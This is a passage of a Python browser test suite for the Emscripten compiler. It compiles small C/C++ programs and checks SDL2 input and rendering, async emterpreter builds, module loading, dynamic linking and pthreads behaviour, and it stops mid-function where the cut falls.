open(os.path.join(self.get_dir(), 'sdl2_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'USE_SDL=2']).communicate()
self.run_browser('page.html', '', '/report_result?1', timeout=30)
def test_sdl2_mouse_offsets(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'page.html'), 'w').write('''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
open(os.path.join(self.get_dir(), 'sdl2_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify', '0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-s', 'USE_SDL=2']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True) # XXX closure fails on proxy
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-s', 'USE_SDL=2'])
def zzztest_sdl2_gfx_primitives(self):
self.btest('sdl2_gfx_primitives.c', args=['-s', 'USE_SDL=2', '-lSDL2_gfx'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl2_canvas_palette_2(self):
open(os.path.join(self.get_dir(), 'args-r.js'), 'w').write('''
Module['arguments'] = ['-r'];
''')
open(os.path.join(self.get_dir(), 'args-g.js'), 'w').write('''
Module['arguments'] = ['-g'];
''')
open(os.path.join(self.get_dir(), 'args-b.js'), 'w').write('''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-s', 'USE_SDL=2'])
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'])
def test_sdl2_canvas_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
open('test.html', 'w').write(html)
open('data.txt', 'w').write('datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-s', 'USE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-s', 'GL_TESTING=1'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-s', 'USE_SDL=2'])
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
open(os.path.join(self.get_dir(), 'sdl2_gl_read.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_gl_read.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_gl_read.c'), '-o', 'something.html', '-s', 'USE_SDL=2']).communicate()
self.run_browser('something.html', '.', '/report_result?1')
def test_sdl2_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2','-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2','--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2','--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2','--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2','--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-s', 'USE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-s', 'USE_SDL=2'])
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = open('test.html').read()
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
open('test.html', 'w').write(html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-s', 'USE_SDL=2'], manual_reference=True, post_build=post_build)
def test_sdl2_ttf(self):
shutil.copy2(path_from_root('tests', 'freetype', 'LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window',
timeout=30)
def test_sdl2_custom_cursor(self):
shutil.copyfile(path_from_root('tests', 'cursor.bmp'), os.path.join(self.get_dir(), 'cursor.bmp'))
self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-s', 'USE_SDL=2'])
def test_sdl2_misc(self):
self.btest('sdl2_misc.c', expected='1', args=['-s', 'USE_SDL=2'])
print('also test building to object files first')
src = open(path_from_root('tests', 'sdl2_misc.c')).read()
open('test.c', 'w').write(self.with_report_result(src))
Popen([PYTHON, EMCC, 'test.c', '-s', 'USE_SDL=2', '-o', 'test.o']).communicate()
Popen([PYTHON, EMCC, 'test.o', '-s', 'USE_SDL=2', '-o', 'test.html']).communicate()
self.run_browser('test.html', '...', '/report_result?1')
def test_cocos2d_hello(self):
from tools import system_libs
cocos2d_root = os.path.join(system_libs.Ports.get_build_dir(), 'Cocos2d')
preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
args=['-s', 'USE_COCOS2D=3', '--std=c++11', '--preload-file', preload_file, '--use-preload-plugins'],
message='You should see Cocos2d logo',
timeout=30)
def test_emterpreter_async(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-g2'])
def test_emterpreter_async_2(self):
self.btest('emterpreter_async_2.cpp', '40', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O3'])
def test_emterpreter_async_virtual(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_virtual.cpp', '5', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-profiling'])
def test_emterpreter_async_virtual_2(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_virtual_2.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'ASSERTIONS=1', '-s', 'SAFE_HEAP=1', '-profiling'])
def test_emterpreter_async_bad(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_bad.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_middle"]', '-s', 'ASSERTIONS=1'])
def test_emterpreter_async_mainloop(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_mainloop.cpp', '121', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts)], timeout=20)
def test_emterpreter_async_with_manual(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_with_manual.cpp', '121', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_acall"]'], timeout=20)
def test_emterpreter_async_sleep2(self):
self.btest('emterpreter_async_sleep2.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Oz'])
def test_emterpreter_async_sleep2_safeheap(self):
# check that safe-heap machinery does not cause errors in async operations
self.btest('emterpreter_async_sleep2_safeheap.cpp', '17', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Oz', '-profiling', '-s', 'SAFE_HEAP=1', '-s', 'ASSERTIONS=1', '-s', 'EMTERPRETIFY_WHITELIST=["_main","_callback","_fix"]', '-s', 'NO_EXIT_RUNTIME=0'])
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Os', '-s', 'ASSERTIONS=1', '-s', 'DISABLE_EXCEPTION_CATCHING=0', '-profiling', '-s', 'SAFE_HEAP=1', '-lSDL'], timeout=60)
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Os'], timeout=30)
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1'], timeout=30)
def test_emterpreter_async_iostream(self):
self.btest('emterpreter_async_iostream.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1'])
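  # Test MODULARIZE=1 output with various optimization levels, EXPORT_NAME values and instantiation patterns (including the then() API).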
def test_modularize(self):
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
for args, code in [
([], 'Module();'), # defaults
# use EXPORT_NAME
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
          HelloWorld.noInitialRun = true; // erroneous module capture will load this and cause timeout
HelloWorld();
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
var hello = HelloWorld({ noInitialRun: true, onRuntimeInitialized: function() {
setTimeout(function() { hello._main(); }); // must be async, because onRuntimeInitialized may be called synchronously, so |hello| is not yet set!
} });
'''),
# similar, but without a mem init file, everything is sync and simple
(['-s', 'EXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
var hello = HelloWorld({ noInitialRun: true});
hello._main();
'''),
# use the then() API
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(function(hello) {
hello._main();
});
'''),
# then() API, also note the returned value
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
var helloOutside = HelloWorld({ noInitialRun: true }).then(function(hello) {
setTimeout(function() {
hello._main();
if (hello !== helloOutside) throw 'helloOutside has not been set!'; // as we are async, helloOutside must have been set
});
});
'''),
]:
print('test on', opts, args, code)
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
open('test.c', 'w').write(self.with_report_result(src))
Popen([PYTHON, EMCC, 'test.c', '-s', 'MODULARIZE=1'] + args + opts).communicate()
open('a.html', 'w').write('''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
  # test illustrating the regression in the modularize feature since commit c5af8f6
# when compiling with the --preload-file option
def test_modularize_and_preload_files(self):
    # amount of memory, different from the default, that will be allocated for the emscripten heap
totalMemory = 33554432
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
# the main function simply checks that the amount of allocated heap memory is correct
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
EM_ASM({
// use eval here in order for the test with closure compiler enabled to succeed
var totalMemory = Module['TOTAL_MEMORY'];
assert(totalMemory === %d, 'bad memory size');
});
REPORT_RESULT(0);
return 0;
}
''' % totalMemory
open('test.c', 'w').write(self.with_report_result(src))
# generate a dummy file
open('dummy_file', 'w').write('dummy')
# compile the code with the modularize feature and the preload-file option enabled
Popen([PYTHON, EMCC, 'test.c', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts).communicate()
open('a.html', 'w').write('''
<script src="a.out.js"></script>
<script>
// instantiate the Foo module with custom TOTAL_MEMORY value
var foo = Foo({ TOTAL_MEMORY: %d });
</script>
''' % totalMemory)
self.run_browser('a.html', '...', '/report_result?0')
def test_webidl(self):
# see original in test_core.py
output = Popen([PYTHON, path_from_root('tools', 'webidl_binder.py'),
path_from_root('tests', 'webidl', 'test.idl'),
'glue']).communicate()[0]
assert os.path.exists('glue.cpp')
assert os.path.exists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print(opts)
self.btest(os.path.join('webidl', 'test.cpp'), '1', args=['--post-js', 'glue.js', '-I' + path_from_root('tests', 'webidl'), '-DBROWSER'] + opts)
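  # Test dynamic linking of a MAIN_MODULE against a SIDE_MODULE at runtime, in both asm.js and wasm.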
def test_dynamic_link(self):
open('pre.js', 'w').write('''
Module.dynamicLibraries = ['side.js'];
''')
open('main.cpp', 'w').write(r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = Module.print;
Module.print = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
REPORT_RESULT(2);
return 0;
}
''')
open('side.cpp', 'w').write(r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
Popen([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.js']).communicate()
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js'])
print('wasm in worker (we can read binary data synchronously there)')
open('pre.js', 'w').write('''
var Module = { dynamicLibraries: ['side.wasm'] };
''')
Popen([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.js', '-s', 'WASM=1']).communicate()
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'WASM=1', '--proxy-to-worker'])
print('wasm (will auto-preload since no sync binary reading)')
open('pre.js', 'w').write('''
Module.dynamicLibraries = ['side.wasm'];
''')
# same wasm side module works
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'WASM=1'])
def test_dynamic_link_glemu(self):
open('pre.js', 'w').write('''
Module.dynamicLibraries = ['side.js'];
''')
open('main.cpp', 'w').write(r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
REPORT_RESULT(1);
return 0;
}
''')
open('side.cpp', 'w').write(r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
Popen([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.js', '-lSDL']).communicate()
self.btest(self.in_dir('main.cpp'), '1', args=['-s', 'MAIN_MODULE=1', '-O2', '-s', 'LEGACY_GL_EMULATION=1', '-lSDL', '-lGL', '--pre-js', 'pre.js'])
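  # Test that the heap can grow (ALLOW_MEMORY_GROWTH) while a large file is being preloaded during startup.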
def test_memory_growth_during_startup(self):
open('data.dat', 'w').write('X' * (30*1024*1024))
self.btest('browser_test_hello_world.c', '0', args=['-s', 'ASSERTIONS=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'TOTAL_MEMORY=16MB', '-s', 'TOTAL_STACK=5000', '--preload-file', 'data.dat'])
# pthreads tests
def prep_no_SAB(self):
open('html.html', 'w').write(open(path_from_root('src', 'shell_minimal.html')).read().replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
# Test that the emscripten_ atomics api functions work.
def test_pthread_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=120) # extra time on first test, to be sure to build all libraries
# Test 64-bit atomics.
def test_pthread_64bit_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_atomics.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=90)
# Test 64-bit C++11 atomics.
def test_pthread_64bit_cxx11_atomics(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_cxx11_atomics.cpp'), expected='0', args=opt + pthreads + ['-std=c++11'], timeout=30)
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
def test_pthread_gcc_atomic_fetch_and_op(self):
# We need to resort to using regexes to optimize out SharedArrayBuffer when pthreads are not supported, which is brittle!
# Therefore perform very extensive testing of different codegen modes to catch any problems.
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-O3', '-s', 'AGGRESSIVE_VARIABLE_ELIMINATION=1'], ['-Os'], ['-Oz']]:
for debug in [[], ['-g1'], ['-g2'], ['-g4']]:
for f32 in [[], ['-s', 'PRECISE_F32=1']]:
print(opt, debug, f32)
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_fetch_and_op.cpp'), expected='0', args=opt+debug+f32+['-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=60, also_wasm=False)
# 64 bit version of the above test.
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30, also_wasm=False)
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
def test_pthread_gcc_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_op_and_fetch.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30, also_wasm=False)
# 64 bit version of the above test.
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30, also_wasm=False)
  # Tests the remaining GCC atomics, beyond the two tests above.
def test_pthread_gcc_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomics.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_spinlock.cpp'), expected='800', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, timeout=30, also_wasm=False)
# Test that basic thread creation works.
def test_pthread_create(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [['-s', 'USE_PTHREADS=1'], ['-s', 'USE_PTHREADS=2', '--separate-asm']]:
print(str(opt) + ' ' + str(pthreads))
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create.cpp'), expected='0', args=opt + pthreads + ['-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
if 'USE_PTHREADS=2' in pthreads:
self.prep_no_SAB()
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create.cpp'), expected='0', args=opt + pthreads + ['-s', 'PTHREAD_POOL_SIZE=8', '--shell-file', 'html.html'], timeout=30)
# Tests the -s PROXY_TO_PTHREAD=1 option.
def test_pthread_proxy_to_pthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxy_to_pthread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'], timeout=30)
# Test that a pthread can spawn another pthread of its own.
def test_pthread_create_pthread(self):
for opt in [['-s', 'USE_PTHREADS=2', '--separate-asm'], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=opt + ['-O3', '-s', 'PTHREAD_POOL_SIZE=2'], timeout=30)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
def test_pthread_nested_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_nested_spawns.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=2'], timeout=30)
# Test that main thread can wait for a pthread to finish via pthread_join().
def test_pthread_join(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_join.cpp'), expected='6765', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ERROR_ON_UNDEFINED_SYMBOLS=1'], timeout=30)
# Test pthread_cancel() operation
def test_pthread_cancel(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cancel.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test pthread_kill() operation
def test_pthread_kill(self):
if get_browser() and 'chrom' in get_browser().lower():
      # This test hangs the chrome render process, and keeps subsequent tests from passing too
return self.skip("pthread_kill hangs chrome renderer")
self.btest(path_from_root('tests', 'pthread', 'test_pthread_kill.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
  # Test that the pthread cleanup stack (pthread_cleanup_push/_pop) works.
def test_pthread_cleanup(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cleanup.cpp'), expected='907640832', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Tests the pthread mutex api.
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_mutex.cpp'), expected='50', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, timeout=30)
# Test that memory allocation is thread-safe.
def test_pthread_malloc(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Stress test pthreads allocating memory that will call to sbrk(), and main thread has to free up the data.
def test_pthread_malloc_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc_free.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'TOTAL_MEMORY=256MB'], timeout=30)
# Test that the pthread_barrier API works ok.
def test_pthread_barrier(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_barrier.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test the pthread_once() function.
def test_pthread_once(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_once.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test against a certain thread exit time handling bug by spawning tons of threads.
def test_pthread_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_spawns.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that
# kind of scheme will work with Emscripten as well.
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
